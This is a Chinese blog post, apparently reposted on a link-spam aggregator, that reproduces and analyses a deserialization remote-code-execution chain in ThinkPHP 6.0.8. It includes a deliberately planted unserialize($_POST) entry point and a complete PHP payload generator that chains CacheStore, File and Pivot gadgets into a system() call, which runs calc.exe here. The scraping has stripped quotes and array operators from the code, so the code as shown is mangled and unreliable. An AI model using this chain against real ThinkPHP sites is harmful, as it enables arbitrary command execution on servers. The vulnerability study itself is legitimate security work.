当前位置: 首页 > news >正文

常德网络建站wordpress发布外网访问

news 2025/9/16 10:06:56
常德网络建站,wordpress发布外网访问,wordpress防止频繁搜索,怎样设网站漏洞说明 1. 漏洞原理#xff1a;ThinkPHP 6.0.8 CacheStore 会触发POP利用链子#xff0c;造成任意命令执行 2. 组件描述#xff1a; ThinkPHP是一个免费开源的#xff0c;快速、简单的面向对象的轻量级PHP开发框架 3. 影响版本#xff1a;V6.0.8 漏洞复现 1. 环境安…漏洞说明 1. 漏洞原理ThinkPHP 6.0.8 CacheStore 会触发POP利用链子造成任意命令执行 2. 组件描述 ThinkPHP是一个免费开源的快速、简单的面向对象的轻量级PHP开发框架 3. 影响版本V6.0.8 漏洞复现 1. 环境安装ThinkPHP6.0正式完整版下载_其他_技术博文_js代码 下载v6.0.8使用命令php think run即环境起来了 访问127.0.0.1:8000 需要在源代码中加入一个入口 if(isset($_POST[data])) {unserialize($_POST[data]); } highlight_string(file_get_contents(__FILE__)); 利用exp生成payload并打入data入口 ?phpnamespace League\Flysystem\Cached\Storage {abstract class AbstractCache{protected $autosave;public function __construct(){$this-autosave false;}} }namespace think\filesystem {use League\Flysystem\Cached\Storage\AbstractCache;use think\cache\driver\File;class CacheStore extends AbstractCache{protected $store;protected $expire;protected $key;public function __construct(){$this-store new File();$this-expire 1;$this-key 1;}}echo urlencode(serialize(new CacheStore())); }namespace think\cache {use think\model\Pivot;abstract class Driver{protected $options [expire 0,cache_subdir true,prefix ,path ,hash_type md5,data_compress false,tag_prefix tag:,serialize [system],];public function __construct(){$this-options [expire 0,cache_subdir true,prefix ,path new Pivot(),hash_type md5,data_compress false,tag_prefix tag:,serialize [system],];}} }namespace think\cache\driver {use think\cache\Driver;class File extends Driver{} }namespace think {use think\model\concern\Attribute;abstract class Model{private $data [];private $withAttr [];public function __construct(){$this-data [errorr0 calc.exe];$this-visible [errorr0 1];$this-withAttr [errorr0 system];}} }namespace think\model\concern {trait Attribute{} }namespace think\model {use think\Model;class Pivot extends Model{} } 漏洞分析 全局搜索找到CacheStore所在位置src/think/filesystem/CacheStore.php 找到它的父类AbstractCache查看发现有__destruct() 步入save查看 跟进查看getForStorage() 没有发现可利用点步出看save后面的 $this-store-set($this-key, $contents, $this-expire); 这里$this-store是可控的所以可以调用任意含义set()函数的对象这里调用src/think/cache/driver/File.php::set 跟进getExpireTime()查看如下 没有可利用点步出继续往下步入getCacheKey()查看 前面使用了hash()函数第一个为hash类型的设置如果为空或者设置有误则会报错我们需要保证上面不截断的前提下执行下面return的步骤return中$this-options[path]与$name进行了拼接而$this-options[path]是可控的如果实例化一个有__toString()魔术方法的对象保证$name不报错则可以搭成一个链经过查找发现vendor\topthink\think-orm\src\model\concern\Conversion有__toString可以利用 步入toArray()查看情况 这里看到如果满足条件判断则可以执行getAttr()步入查看 不出错就应该进入getData() 没什么特别的直接看外层的getValue() 这里可以构造一个自定义函数以及利用data传参达到任意命令执行而有个问题就是触发了漏洞怎么将他们链接起来并且还有一个问题就是恶意payload如何传入这里经过审计发现需要传入的恶意$data参数是vendor\topthink\think-orm\src\model\concern\Attribute中而在vendor\topthink\think-orm\src\Model可控制$data并且 Model复用了Conversion的内容这样也可以触发__toString最后构造就按照分析的将几个类复用再给几个类中特殊需要赋值即可还有一个小问题就是如上图Model是抽象类因此我们需要自己手写一个子类继承即可。 Referer tp6.0.8反序列化漏洞分析 - 网安 thinkphp6.0x反序列化复现及再挖掘-安全客 - 安全资讯平台
http://www.tj-hxxt.cn/news/137623.html

相关文章:

  • 万网网站后台登陆网页界面设计的原则有哪些
  • 淘客导购网站怎么做做棋牌网站建设哪家便宜
  • 找外国女朋友的网站建设上杭网页制作
  • 专业网络建站公司太原市城市建设规划局官方网站
  • 网站建设模板软件企业网站策划实训
  • 做个兼职网站设计手机兼职软件推荐app
  • 如何在本地发布自己做的网站对于网站运营应该如何做
  • 重庆营销网站制作徐州网站建设模板
  • 聊城做手机网站福州商城网站开发公司
  • 做网站首页布局设计注意事项眉山建设局网站
  • 简单手机网站模板四川建设招标网站首页
  • 企业网站的建设目的有什么网站制作怎么做语音搜索框
  • 网站建设费用估计Wordpress pay plugin
  • 实用网站开发怎样才能做好销售
  • 网站改版 升级的目的是什么沧州南皮手机网站建设
  • 河北seo网站设计网约车后台平台网站建设
  • 网站建设属于软件技术就业前景怎么样
  • 北京经济技术开发区建设局网站跨境电商商城源码
  • 惠州住房和城乡建设部网站安丘市住房和城乡建设局网站
  • 网站做优化现在公众号做电影网站的发展
  • 有教做鱼骨图的网站吗wordpress会员微信支付宝
  • 数字营销名词解释门户网站怎么做seo
  • 网站建站免费如何做网站流量分析报表
  • 个人建立网站要多少钱岳阳整站优化
  • 泰安公司做网站怎么做互联网创业
  • 海拉尔网站建设公司wordpress弹出式表单
  • 免费微网站平台那个好企业小程序注册
  • 怎么选择网站模板wordpress动漫acg主题
  • 湖南广源建设工程有限公司网站中国建设安全监理协会网站
  • 网站免费维护建立网站网站怎么自己做优化